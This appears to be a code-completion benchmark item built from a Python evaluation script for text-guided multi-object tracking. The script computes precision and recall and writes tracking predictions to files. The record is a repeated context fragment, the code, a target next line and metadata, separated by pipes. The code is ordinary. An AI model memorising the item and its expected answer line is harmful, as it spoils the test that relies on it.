(tracks[:, 0] == int(frame_id)) *
(tracks[:, 1] == int(obj_id))
][0]
assert bbox.shape in ((9, ), (10, ))
if MIN_FRAME < bbox[0] < MAX_FRAME: # TODO
# the min/max frame is not included in `gt.txt`
f.write(','.join(list(map(str, bbox))) + '\n')
if __name__ == '__main__':
print(
'========== Testing (Text-Guided {}) =========='
.format('ON' if opt.kum_mode else 'OFF')
)
output_path = join(opt.save_root, opt.exp_name, f'results{opt.save_postfix}.json')
if not exists(output_path):
|
warnings.filterwarnings('ignore')
# import `opts` first to set gpus
def test_accuracy_v1(model, dataloader, save_img=False):
model.eval()
TP, FP, FN = 0, 0, 0
assert dataloader.batch_size == 1
if save_img:
save_dir = join(opt.save_dir, 'images')
os.makedirs(save_dir, exist_ok=True)
global_idx = 1
un_norm = get_transform('unnorm', opt, -1)
with torch.no_grad():
for batch_idx, data in enumerate(tqdm(dataloader)):
# for batch_idx, data in enumerate(dataloader):
# load
expressions = data['target_expressions']
expressions = expressions[0].split(',')
labels = data['target_labels'][0]
images = data['cropped_images']
images = images.repeat_interleave(len(expressions), dim=0)
# forward
inputs = dict(
img=images.cuda(),
exp=tokenize(expressions).cuda(),
)
logits = model(inputs).cpu()
# evaluate
TP += ((logits >= 0) * (labels == 1)).sum()
FP += ((logits >= 0) * (labels == 0)).sum()
FN += ((logits < 0) * (labels == 1)).sum()
# save images
if save_img:
imgs = un_norm(inputs['img'])
for i in range(len(imgs)):
file_name = '{}_{}_{:.0f}_{:.2f}.jpg'.format(
global_idx,
expressions[i].replace(' ', '-'),
labels[i],
logits[i]
)
save_image(
imgs[i],
join(save_dir, file_name)
)
global_idx += 1
PRECISION = TP / (TP + FP) * 100
RECALL = TP / (TP + FN) * 100
return PRECISION, RECALL
def test_accuracy(model, dataloader, save_img=False):
model.eval()
TP, FP, FN = 0, 0, 0
assert dataloader.batch_size == 1
if save_img:
save_dir = join(opt.save_dir, 'images')
os.makedirs(save_dir, exist_ok=True)
global_idx = 1
un_norm = get_transform('unnorm', opt, -1)
with torch.no_grad():
for batch_idx, data in enumerate(tqdm(dataloader)):
# for batch_idx, data in enumerate(dataloader):
# load
expressions = data['target_expressions']
expressions = expressions[0].split(',')
labels = data['target_labels'][0]
# forward
inputs = dict(
local_img=data['cropped_images'].cuda().repeat_interleave(len(expressions), dim=0),
global_img=data['global_images'].cuda().repeat_interleave(len(expressions), dim=0),
exp=tokenize(expressions).cuda(),
)
logits = model(inputs)['logits'].cpu()
# evaluate
TP += ((logits >= 0) * (labels == 1)).sum()
FP += ((logits >= 0) * (labels == 0)).sum()
FN += ((logits < 0) * (labels == 1)).sum()
# save images
if save_img:
local_img = data['cropped_images'].squeeze(0)
global_img = data['global_images'].squeeze(0)
local_img = F.interpolate(local_img, global_img.size()[2:])
imgs = un_norm(
torch.cat(
(local_img, global_img),
dim=0
)
)
imgs = imgs.repeat(len(expressions), 1, 1, 1, 1)
for i in range(len(imgs)):
file_name = '{}_{}_{:.0f}_{:.2f}.jpg'.format(
global_idx,
expressions[i].replace(' ', '-'),
labels[i],
logits[i]
)
save_image(
imgs[i],
join(save_dir, file_name)
)
global_idx += 1
PRECISION = TP / (TP + FP) * 100
RECALL = TP / (TP + FN) * 100
print(TP, FP, FN)
return PRECISION, RECALL
def test_tracking(model, dataloader):
print('========== Testing Tracking ==========')
model.eval()
OUTPUTS = multi_dim_dict(4, list)
with torch.no_grad():
for batch_idx, data in enumerate(tqdm(dataloader)):
# forward
inputs = dict(
local_img=data['cropped_images'].cuda(),
global_img=data['global_images'].cuda(),
exp=tokenize(data['expression_new']).cuda(),
)
similarity = model(inputs)['logits'].cpu()
for idx in range(len(data['video'])):
for frame_id in range(data['start_frame'][idx], data['stop_frame'][idx] + 1):
frame_dict = OUTPUTS[data['video'][idx]][int(data['obj_id'][idx])][int(frame_id)]
frame_dict[data['expression_raw'][idx]].append(similarity[idx].cpu().numpy().tolist())
return OUTPUTS
def generate_final_results(cls_dict, data_dir, track_dir, save_dir, thr_score=0.):
"""
Given the results output by `test_tracking`, generate the final tracking results
- cls_dict: video->id->frame->exp->
"""
template_dir = join(data_dir, 'gt_template')
if exists(save_dir):
shutil.rmtree(save_dir)
for video in os.listdir(template_dir):
if video not in cls_dict:
continue
video_dir_in = join(template_dir, video)
video_dir_out = join(save_dir, video)
MIN_FRAME, MAX_FRAME = FRAMES[video]
# symbolic link for `gt.txt`
for exp in os.listdir(video_dir_in):
exp_dir_in = join(video_dir_in, exp)
exp_dir_out = join(video_dir_out, exp)
os.makedirs(exp_dir_out, exist_ok=True)
gt_path_in = join(exp_dir_in, 'gt.txt')
gt_path_out = join(exp_dir_out, 'gt.txt' )
if not exists(gt_path_out):
os.symlink(gt_path_in, gt_path_out)
# load tracks
# noinspection PyBroadException
try:
tracks = np.loadtxt(join(track_dir, video, 'all', 'gt.txt'), delimiter=',')
except:
tracks_1 = np.loadtxt(join(track_dir, video, 'car', 'predict.txt'), delimiter=',')
if len(tracks_1.shape) == 2:
tracks = tracks_1
max_obj_id = max(tracks_1[:, 1])
else:
tracks = np.empty((0, 10))
max_obj_id = 0
tracks_2 = np.loadtxt(join(track_dir, video, 'pedestrian', 'predict.txt'), delimiter=',')
if len(tracks_2.shape) == 2:
tracks_2[:, 1] += max_obj_id
tracks = np.concatenate((tracks, tracks_2), axis=0)
# generate `predict.txt`
video_dict = cls_dict[video]
for obj_id, obj_dict in video_dict.items():
for frame_id, frame_dict in obj_dict.items():
for exp in EXPRESSIONS[video]:
if exp in EXPRESSIONS['dropped']:
continue
if exp not in frame_dict: # TODO: can be removed
continue
exp_dir_out = join(video_dir_out, exp)
score = np.mean(frame_dict[exp])
with open(join(exp_dir_out, 'predict.txt'), 'a') as f:
if score > thr_score:
bbox = tracks[
(tracks[:, 0] == int(frame_id)) *
(tracks[:, 1] == int(obj_id))
][0]
assert bbox.shape in ((9, ), (10, ))
if MIN_FRAME < bbox[0] < MAX_FRAME: # TODO
# the min/max frame is not included in `gt.txt`
f.write(','.join(list(map(str, bbox))) + '\n')
if __name__ == '__main__':
print(
'========== Testing (Text-Guided {}) =========='
.format('ON' if opt.kum_mode else 'OFF')
)
output_path = join(opt.save_root, opt.exp_name, f'results{opt.save_postfix}.json')
if not exists(output_path): | model = get_model(opt, 'Model') | 1 | 2023-10-31 07:08:37+00:00 | 4k |